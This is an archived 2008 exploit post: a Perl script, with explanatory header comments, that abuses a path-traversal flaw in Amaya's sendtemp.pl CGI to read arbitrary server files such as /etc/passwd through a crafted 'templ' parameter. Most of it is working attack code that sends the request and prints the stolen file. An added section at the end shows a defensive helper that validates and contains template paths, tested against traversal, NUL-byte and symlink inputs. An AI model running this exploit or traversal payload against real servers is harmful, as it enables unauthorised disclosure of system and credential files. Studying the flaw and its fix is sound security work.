Date Added: 2008-10-20 22:59
#!/usr/bin/perl -w
# sendtemp.pl, a part of the Amaya Web development
# server, contains a file disclosure vulnerability,
# which allows remote read access to files
# on the server's file system, as whichever
# user the httpd is running as.
#
# The vulnerability is really quite simple.
# When the `templ` argument is passed to
# sendtemp.pl, it adds a link to the chosen stylesheet
# and a META field containing the publication's
# URL of the new file to the chosen template.
# For example:
#
# http://localhost/cgi-bin/sendtemp.pl?templ=template.xml
# This is all well and good, however..
# There is no sanity checking on the param you pass to the script..
# Ie: my $temp_file = param("templ");
#
# So by simply issuing a GET to:
# "http://localhost/cgi-bin/sendtemp.pl?templ=../../etc/passwd"
# the system's file system can be traversed and the passwd file can be read.
# (Assuming the http daemon hasn't been run under chroot())
#
# What follows is a simple exploit; however, it's just as easy
# to do this manually in your web browser.
# I really couldn't be bothered to format the output in any way;
# it only encourages script kiddies.
#
# Finally, "l33t hax0r greetz" to..
# ne0h, b0red, loophole, shad0w and the old dL crew..
# Scott, Jim, Mike.. All of the guys at Global Intersec.
#
# Tom Parker - tom@rooted.net
# MRX of HHP-Programming (www.hhp-programming.net)
# Global InterSec INC California - Security Audits, Penetration testing, code auditing.
use IO::Socket;
print qq~
----------------------------------------------------------
W3.ORG sendtemp.pl exploit by Tom Parker - tom\@rooted.net
MRX of HHP-Programming (www.hhp-programming.net)
- Global InterSec INC California -
----------------------------------------------------------
~;
# Both a host name and a file to request are required.
if((!defined($ARGV[0]))||(!defined($ARGV[1]))) {
    print "Usage\: \%filename\.pl \<hostname\> \<file-to-get\>\n";
    exit 0;
}
$SOCKET = IO::Socket::INET->new("$ARGV[0]:80");
# The requested file name goes into the templ parameter unchanged.
print $SOCKET "GET /cgi-bin/sendtemp.pl?templ=$ARGV[1]\n";
print "Sent request for $ARGV[1] (http://$ARGV[0]/cgi-bin/sendtemp.pl\?templ\=$ARGV[1])\n";
# Collect the whole response.
while(<$SOCKET>) {
    push @DATA, $_;
}
my $woot = join(' ',@DATA);
# sendtemp.pl reports "<file> wasn't found" when the file is missing.
if($woot =~/$ARGV[1] wasn't found/) {
    print "$ARGV[1] doesn't seem to exist.\n";
    exit 0;
}
else { print "@DATA"; }
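
The check that the header comments say is missing, as an added example (not part of the original advisory and not Amaya's own sendtemp.pl code): a hypothetical `resolve_template` helper that accepts only bare template names and confirms the resolved path stays inside the template directory. The flat template directory, the `.xml`/`.html` extensions and the sample inputs are assumptions constructed for the demo.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use Cwd qw(realpath);
use File::Spec;
use File::Temp qw(tempdir);

# Hypothetical helper: map the untrusted "templ" value to a file inside
# $base_dir, or return undef. Assumes templates sit in one flat directory.
sub resolve_template {
    my ($base_dir, $templ) = @_;
    return undef unless defined $templ;

    # 1. Allow-list: a bare file name, no separators, no "..", no NUL byte.
    return undef unless $templ =~ /\A[A-Za-z0-9_-]+\.(?:xml|html)\z/;

    # 2. Canonicalise both paths so a symlink inside the template
    #    directory cannot point the script somewhere else.
    my $base = realpath($base_dir);
    my $path = realpath(File::Spec->catfile($base_dir, $templ));
    return undef unless defined $base && defined $path && -f $path;

    # 3. Containment check on the resolved path.
    return index($path, "$base/") == 0 ? $path : undef;
}

# Constructed demo data: a throwaway template directory.
my $dir = tempdir(CLEANUP => 1);
open(my $fh, '>', "$dir/template.xml") or die "cannot write sample: $!";
print {$fh} "<template/>\n";
close($fh);
symlink('/etc/passwd', "$dir/link.xml");    # symlink escaping the directory

# Constructed inputs: one valid name, then the request shapes to refuse.
for my $templ ('template.xml', '../../etc/passwd', '/etc/passwd',
               "template.xml\0.html", 'link.xml') {
    (my $shown = $templ) =~ s/\0/\\0/g;     # make the NUL byte printable
    printf "%-24s %s\n", $shown,
        defined(resolve_template($dir, $templ)) ? 'served' : 'rejected';
}
```

Only `template.xml` is served; the traversal, absolute-path, NUL-byte and symlink inputs are all rejected before any file is opened.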